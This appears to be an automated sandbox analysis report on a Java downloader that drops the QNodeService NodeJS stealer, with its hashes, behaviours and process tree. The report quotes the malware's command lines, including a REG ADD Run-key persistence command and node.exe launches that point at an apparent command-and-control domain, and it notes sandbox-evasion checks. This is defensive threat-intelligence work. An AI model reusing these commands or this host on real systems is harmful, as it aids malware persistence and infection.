jar.jar

General
  Target:     jar.jar
  Filesize:   81KB
  Completed:  19-11-2020 12:27
  Score:      10/10
  MD5:        9e8b6710fdd55ad0675295c2c3960732
  SHA1:       aed08772376bde9f848f335e77e2e3c3c230234d
  SHA256:     f2fb2d0c469abc0add346ef809ad86e0194400d391a2e5429b8cbeea2711bbad

Signatures (8)


Tactics: Defense Evasion, Discovery, Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    Processes: node.exe, node.exe, node.exe

    Reported IOCs

    PID    Process
    3524   node.exe
    2652   node.exe
    1200   node.exe
  • Adds Run key to start application
    Processes: reg.exe

    TTPs

    Registry Run Keys / Startup Folder; Modify Registry

    Reported IOCs

    Description      IOC                                                                                                                                                                                              Process
    Key created      \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run                                                                                      reg.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\cf695db1-96d2-45d6-a745-87e554e6cd0d = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""   reg.exe
  • JavaScript code in executable

    Reported IOCs

    Resource                                      YARA rule
    behavioral2/files/0x000100000001ab51-170.dat  js
    behavioral2/files/0x000100000001ab51-174.dat  js
    behavioral2/files/0x000100000001ab51-178.dat  js
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    Flow  IOC
    21    wtfismyip.com
    22    wtfismyip.com
  • Checks processor information in registry
    Processes: node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry; System Information Discovery

    Reported IOCs

    Description         IOC                                                                                  Process
    Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                     node.exe
    Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                node.exe
    Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe
    Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                     node.exe
    Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                node.exe
    Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe
  • Suspicious behavior: EnumeratesProcesses
    Processes: node.exe, node.exe, node.exe

    Reported IOCs

    PID    Process   Events reported
    3524   node.exe  4
    2652   node.exe  4
    1200   node.exe  10
  • Suspicious use of WriteProcessMemory
    Processes: java.exe, javaw.exe, node.exe, node.exe, node.exe, cmd.exe

    Reported IOCs

    Description                        PID   Process    Target process   Events reported
    PID 2868 wrote to memory of 3744   2868  java.exe   javaw.exe        2
    PID 3744 wrote to memory of 3524   3744  javaw.exe  node.exe         2
    PID 3524 wrote to memory of 2652   3524  node.exe   node.exe         2
    PID 2652 wrote to memory of 1200   2652  node.exe   node.exe         2
    PID 1200 wrote to memory of 848    1200  node.exe   cmd.exe          2
    PID 848 wrote to memory of 4032    848   cmd.exe    reg.exe          2
Processes (7)
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\jar.jar
    Suspicious use of WriteProcessMemory
    PID:2868
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\08637946.tmp
      Suspicious use of WriteProcessMemory
      PID:3744
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain tmv2020.zapto.org
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:3524
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js --hub-domain tmv2020.zapto.org
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js --hub-domain tmv2020.zapto.org
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:1200
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "cf695db1-96d2-45d6-a745-87e554e6cd0d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:848
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "cf695db1-96d2-45d6-a745-87e554e6cd0d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:4032
Downloads

  • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
    MD5:    3031a035435f0b9d833559aceedc07c6
    SHA1:   e806e287c7b1324969351d6d7b3aa9903bb053f6
    SHA256: df480b78ce4f2811ba6849fbc1e892b4cefc4a6e00f616c9157b7b55c5ce088e
    SHA512: dae7101c4ffc96f8c8f89aaf638253e8199c2973412764e07062e0b75d98cbf0a0d3ef8228b7f14c7ed62e4033e22ce145e451c36b21cc4c2d5cfa6c6349e0d8

  • C:\Users\Admin\AppData\Local\Temp\08637946.tmp
    MD5:    9e8b6710fdd55ad0675295c2c3960732
    SHA1:   aed08772376bde9f848f335e77e2e3c3c230234d
    SHA256: f2fb2d0c469abc0add346ef809ad86e0194400d391a2e5429b8cbeea2711bbad
    SHA512: 26f94b0b9766e9c244297cbe4af78f1b09087fbe471f099b5a77f5ca76fd5c905ee4d36188af67dbd6dc2c7f8402c882d0d2503a288af277840a1025562eac96

  • C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js
    MD5:    3859487feb5152e9d1afc4f8cd320608
    SHA1:   7bf154c9ddf3a71abf15906cdb60773e8ae07b62
    SHA256: 8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
    SHA512: 826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

  • C:\Users\Admin\node-v14.12.0-win-x64\node.exe (listed three times in the report, identical hashes)
    MD5:    f0b11a5823c45fc2664e116dc0323bcb
    SHA1:   612339040c1f927ec62186cd5012f4bb9c53c1b9
    SHA256: 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
    SHA512: 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

  • memory/848-180-0x0000000000000000-mapping.dmp
  • memory/1200-179-0x0000010C14700000-0x0000010C14701000-memory.dmp
  • memory/1200-177-0x0000000000000000-mapping.dmp
  • memory/2652-175-0x0000032D28D00000-0x0000032D28D01000-memory.dmp
  • memory/2652-173-0x0000000000000000-mapping.dmp
  • memory/3524-172-0x0000014395980000-0x0000014395981000-memory.dmp
  • memory/3524-169-0x0000000000000000-mapping.dmp
  • memory/3744-53-0x0000000000000000-mapping.dmp
  • memory/4032-181-0x0000000000000000-mapping.dmp